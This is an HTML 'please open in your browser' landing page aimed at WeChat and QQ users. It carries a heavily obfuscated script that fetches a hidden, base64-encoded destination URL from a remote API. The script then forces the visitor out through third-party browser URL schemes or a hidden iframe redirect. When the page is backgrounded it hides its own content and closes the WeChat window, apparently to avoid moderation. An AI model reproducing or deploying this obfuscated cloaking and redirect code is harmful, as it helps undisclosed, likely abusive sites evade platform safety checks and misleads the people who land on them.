<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>&#x8bf7;&#x4f7f;&#x7528;&#x6d4f;&#x89c8;&#x5668;&#x6253;&#x5f00;</title>
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" name="viewport" />
    <meta content="yes" name="apple-mobile-web-app-capable" />
    <meta content="black" name="apple-mobile-web-app-status-bar-style" />
    <meta name="format-detection" content="telephone=no" />
    <meta content="false" name="twcClient" id="twcClient" />
	<meta name="referrer" content="no-referrer" />
    <meta name="aplus-touch" content="1" />
	<script src="https://lf26-cdn-tos.bytecdntp.com/cdn/expire-1-M/jquery/2.1.4/jquery.min.js"></script>
    <script src="https://lf26-cdn-tos.bytecdntp.com/cdn/expire-1-M/clipboard.js/2.0.10/clipboard.min.js"></script>
    <style>
        body,
        html {
            width: 100%;
            height: 100%
        }
        
        * {
            margin: 0;
            padding: 0
        }
        
        body {
            background-color: #fff
        }
        
        .top-bar-guidance {
            font-size: 15px;
            color: #fff;
            height: 70%;
            line-height: 1.8;
            padding-left: 20px;
            padding-top: 20px;
            background: url(https://ae01.alicdn.com/kf/H0b46de0c42de4b9591fcb13bc4fa46a8d.jpg) center top/contain no-repeat
        }
        
        .top-bar-guidance .icon-safari {
            width: 25px;
            height: 25px;
            vertical-align: middle;
            margin: 0 .2em
        }
        
        .app-download-tip {
            margin: 0 auto;
            width: 290px;
            text-align: center;
            font-size: 15px;
            color: #2466f4;
            background: url(https://ae01.alicdn.com/kf/Hc399f9b976914d0297397c1e4c14fe82l.png) left center/auto 15px repeat-x
        }
        
        .app-download-tip .guidance-desc {
            background-color: #fff;
            padding: 0 5px
        }
        
        .app-download-btn {
            display: block;
            width: 214px;
            height: 40px;
            line-height: 40px;
            margin: 18px auto 0 auto;
            text-align: center;
            font-size: 18px;
            color: #2466f4;
            border-radius: 20px;
            border: .5px #2466f4 solid;
            text-decoration: none
        }
    </style>
</head>
<body  id="Zl" style="display: block;">
    <div class="top-bar-guidance">
        <p id="imgs" class="xs"></p>
        <p>可以继续浏览本站哦~</p>
    </div>
    <div align="left"><img src="//ae01.alicdn.com/kf/H0f1db21203e94032a264095c1ae77be0h.png" style="position:absolute;top:7px;width:100%;"></div>
    <div class="app-download-tip">
        <span class="guidance-desc">您也可以复制该网址,到其它浏览器打开</span>
    </div>
    <a style="display: none;" href="" id="vurl" rel="noreferrer"></a>
    <a data-clipboard-text="" class="app-download-btn" id="fz" onclick="fz()">点击复制网址</a>
    
</body>

<script>
var _0xodB='jsjiami.com.v6',_0xodB_=['_0xodB'],_0x383f=[_0xodB,'\x61\x64\x64\x45\x76\x65\x6e\x74\x4c\x69\x73\x74\x65\x6e\x65\x72','\x76\x69\x73\x69\x62\x69\x6c\x69\x74\x79\x63\x68\x61\x6e\x67\x65','\x76\x69\x73\x69\x62\x69\x6c\x69\x74\x79\x53\x74\x61\x74\x65','\x68\x69\x64\x64\x65\x6e','\x74\x69\x74\x6c\x65','\x23\x5a\x6c','\x63\x73\x73','\x64\x69\x73\x70\x6c\x61\x79','\x6e\x6f\x6e\x65','\x63\x61\x6c\x6c','\x63\x6c\x6f\x73\x65\x57\x69\x6e\x64\x6f\x77','\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64','\x69\x6d\x67\x73','\x74\x65\x73\x74','\x75\x73\x65\x72\x41\x67\x65\x6e\x74','\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c','\u70b9\u51fb\u53f3\u4e0a\u89d2\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x65\x70\x2e\x71\x70\x69\x63\x2e\x63\x6e\x2f\x63\x6f\x72\x61\x6c\x2f\x51\x33\x61\x75\x48\x67\x7a\x77\x7a\x4d\x34\x66\x67\x51\x34\x31\x56\x54\x46\x32\x72\x4c\x72\x4e\x76\x52\x7a\x6d\x69\x62\x69\x62\x71\x72\x6a\x54\x46\x6a\x35\x67\x32\x6b\x7a\x47\x79\x6f\x51\x6a\x33\x56\x69\x61\x72\x74\x41\x45\x51\x2f\x30\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x69\x63\x6f\x6e\x2d\x73\x61\x66\x61\x72\x69\x22\x20\x2f\x3e\x20\x3c\x73\x70\x61\x6e\x20\x69\x64\x3d\x22\x6f\x70\x65\x6e\x6d\x22\x3e\x53\x61\x66\x61\x72\x69\u6253\u5f00\x3c\x2f\x73\x70\x61\x6e\x3e','\x6d\x61\x74\x63\x68','\x4d\x69\x63\x72\x6f\x4d\x65\x73\x73\x65\x6e\x67\x65\x72','\u70b9\u51fb\u53f3\u4e0a\u89d2\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x65\x70\x2e\x71\x70\x69\x63\x2e\x63\x6e\x2f\x63\x6f\x72\x61\x6c\x2f\x51\x33\x61\x75\x48\x67\x7a\x77\x7a\x4d\x34\x66\x67\x51\x34\x31\x56\x54\x46\x32\x72\x4c\x62\x4e\x56\x6d\x7a\x74\x4e\x39\x69\x61\x36\x47\x50\x52\x4a\x30\x49\x46\x69\x63\x75\x63\x46\x54\x72\x34\x50\x70\x38\x78\x7a\x69\x62\x73\x77\x2f\x30\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x69\x63\x6f\x6e\x2d\x73\x61\x66\x61\x72\x69\x22\x20\x2f\x3e\x20\x3c\x73\x70\x61\x6e\x20\x69\x64\x3d\x22\x6f\x70\x65\x6e\x6d\x22\x3e\u6d4f\u89c8\u5668\u6253\u5f00\x3c\x2f\x73\x70\x61\x6e\x3e','\u70b9\u51fb\u53f3\u4e0a\u89d2\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x65\x70\x2e\x71\x70\x69\x63\x2e\x63\x6e\x2f\x63\x6f\x72\x61\x6c\x2f\x51\x33\x61\x75\x48\x67\x7a\x77\x7a\x4d\x34\x66\x67\x51\x34\x31\x56\x54\x46\x32\x72\x4f\x43\x54\x6d\x36\x67\x74\x55\x65\x51\x4b\x58\x37\x6d\x38\x34\x78\x67\x34\x37\x69\x61\x56\x6f\x73\x69\x62\x47\x63\x6b\x72\x50\x30\x4a\x51\x2f\x30\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x69\x63\x6f\x6e\x2d\x73\x61\x66\x61\x72\x69\x22\x20\x2f\x3e\x20\x3c\x73\x70\x61\x6e\x20\x69\x64\x3d\x22\x6f\x70\x65\x6e\x6d\x22\x3e\u6d4f\u89c8\u5668\u6253\u5f00\x3c\x2f\x73\x70\x61\x6e\x3e','\x6c\x6f\x63\x61\x74\x69\x6f\x6e','\x73\x65\x61\x72\x63\x68','\x73\x75\x62\x73\x74\x72\x69\x6e\x67','\x73\x70\x6c\x69\x74','\x6c\x65\x6e\x67\x74\x68','\x76\x75\x72\x6c','\x68\x72\x65\x66','\x63\x6c\x69\x63\x6b','\x72\x61\x6e\x64\x6f\x6d','\x74\x6f\x53\x74\x72\x69\x6e\x67','\x73\x6c\x69\x63\x65','\x61\x6a\x61\x78','\x47\x45\x54','\x26\x69\x64\x3d','\x26\x74\x3d','\x6a\x73\x6f\x6e','\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65','\x64\x77\x7a','\x75\x72\x6c','\x6d\x69\x63\x72\x6f\x6d\x65\x73\x73\x65\x6e\x67\x65\x72','\x23\x66\x7a','\x61\x74\x74\x72','\x64\x61\x74\x61\x2d\x63\x6c\x69\x70\x62\x6f\x61\x72\x64\x2d\x74\x65\x78\x74','\x6d\x74\x74\x62\x72\x6f\x77\x73\x65\x72\x3a\x2f\x2f\x75\x72\x6c\x3d','\x75\x63\x62\x72\x6f\x77\x73\x65\x72\x3a\x2f\x2f','\x62\x61\x69\x64\x75\x62\x6f\x78\x61\x70\x70\x3a\x2f\x2f\x62\x72\x6f\x77\x73\x65\x3f\x75\x72\x6c\x3d','\x67\x6f\x6f\x67\x6c\x65\x63\x68\x72\x6f\x6d\x65\x3a\x2f\x2f\x62\x72\x6f\x77\x73\x65\x3f\x75\x72\x6c\x3d','\x6d\x69\x62\x72\x6f\x77\x73\x65\x72\x3a','\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74','\x69\x66\x72\x61\x6d\x65','\x73\x74\x79\x6c\x65','\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65','\x62\x6f\x64\x79','\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64','\x73\x72\x63','\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x22\x3c\x73\x63\x72\x69\x70\x74\x3e\x74\x6f\x70\x2e\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x27','\x27\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22','\x68\x74\x74\x70\x3a\x2f\x2f\x61\x31\x2e\x6e\x74\x71\x64\x62\x2e\x63\x6e\x2e\x63\x64\x6e\x2e\x64\x6e\x73\x76\x31\x2e\x63\x6f\x6d\x2f\x34\x30\x34\x3f\x6a\x75\x6d\x70\x31','\x74\x65\x78\x74','\u590d\u5236\u6210\u529f','\x6a\x73\x46\x6a\x41\x68\x67\x69\x61\x4c\x6d\x56\x69\x79\x2e\x63\x4c\x68\x6f\x74\x6d\x2e\x76\x36\x4a\x44\x5a\x4c\x43\x6b\x3d\x3d'];function _0x42ae(_0x1b704c,_0x4e395f){_0x1b704c=~~'0x'['concat'](_0x1b704c['slice'](0x0));var _0x1c29a6=_0x383f[_0x1b704c];return _0x1c29a6;};(function(_0x520849,_0x3df201){var _0x537b2f=0x0;for(_0x3df201=_0x520849['shift'](_0x537b2f>>0x2);_0x3df201&&_0x3df201!==(_0x520849['pop'](_0x537b2f>>0x3)+'')['replace'](/[FAhgLVyLhtJDZLCk=]/g,'');_0x537b2f++){_0x537b2f=_0x537b2f^0xfcc89;}}(_0x383f,_0x42ae));document[_0x42ae('0')](_0x42ae('1'),function(){if(document[_0x42ae('2')]==_0x42ae('3')){normal_title=document[_0x42ae('4')];document[_0x42ae('4')]='';$(_0x42ae('5'))[_0x42ae('6')](_0x42ae('7'),_0x42ae('8'));WeixinJSBridge[_0x42ae('9')](_0x42ae('a'));}else document[_0x42ae('4')]='';});var imgs=document[_0x42ae('b')](_0x42ae('c'));if(/ipad|iphone/i[_0x42ae('d')](navigator[_0x42ae('e')])){imgs[_0x42ae('f')]=_0x42ae('10');}else if(navigator[_0x42ae('e')][_0x42ae('11')](/MicroMessenger/i)!=_0x42ae('12')){imgs[_0x42ae('f')]=_0x42ae('13');}else{imgs[_0x42ae('f')]=_0x42ae('14');}function getQueryVariable(_0x2a7d08){var _0x5f3020=window[_0x42ae('15')][_0x42ae('16')][_0x42ae('17')](0x1);var _0x188395=_0x5f3020[_0x42ae('18')]('\x26');for(var _0x2bdc57=0x0;_0x2bdc57<_0x188395[_0x42ae('19')];_0x2bdc57++){var _0x3480d7=_0x188395[_0x2bdc57][_0x42ae('18')]('\x3d');if(_0x3480d7[0x0]==_0x2a7d08){return _0x3480d7[0x1];}}return![];}function openu(_0x553810){document[_0x42ae('b')](_0x42ae('1a'))[_0x42ae('1b')]=_0x553810;document[_0x42ae('b')](_0x42ae('1a'))[_0x42ae('1c')]();}var id=getQueryVariable('\x69\x64');var t=getQueryVariable('\x74');var s=Math[_0x42ae('1d')]()[_0x42ae('1e')](0x24)[_0x42ae('1f')](-0x6);$[_0x42ae('20')]({'\x74\x79\x70\x65':_0x42ae('21'),'\x75\x72\x6c':'https://a.7de.net/api.php?act=geturl3&'+'\x73\x3d'+s+_0x42ae('22')+id+_0x42ae('23')+t,'\x64\x61\x74\x61\x54\x79\x70\x65':_0x42ae('24'),'\x73\x75\x63\x63\x65\x73\x73':function(_0x51c694){var _0x45ac9e=navigator[_0x42ae('e')][_0x42ae('25')]();var _0x190154=decodeURIComponent(atob(_0x51c694[_0x42ae('26')]));var _0x41bea4=decodeURIComponent(atob(_0x51c694[_0x42ae('27')]));if(_0x45ac9e[_0x42ae('11')](/MicroMessenger/i)==_0x42ae('28')||_0x45ac9e[_0x42ae('11')](/QQ/i)=='\x71\x71'){$(_0x42ae('29'))[_0x42ae('2a')](_0x42ae('2b'),_0x41bea4);openu(_0x42ae('2c')+_0x41bea4);openu(_0x42ae('2d')+_0x41bea4);openu(_0x42ae('2e')+_0x41bea4);openu(_0x42ae('2f')+_0x41bea4);openu(_0x42ae('30')+_0x41bea4);}else{var _0x5f3f9e=document[_0x42ae('31')](_0x42ae('32'));_0x5f3f9e[_0x42ae('33')]=_0x42ae('34');document[_0x42ae('35')][_0x42ae('36')](_0x5f3f9e)[_0x42ae('37')]=_0x42ae('38')+_0x41bea4+_0x42ae('39');}},'\x65\x72\x72\x6f\x72':function(_0x42afb2){location[_0x42ae('1b')]=_0x42ae('3a');}});new ClipboardJS(_0x42ae('29'));function fz(){$(_0x42ae('29'))[_0x42ae('3b')](_0x42ae('3c'));};_0xodB='jsjiami.com.v6';
</script>

</html>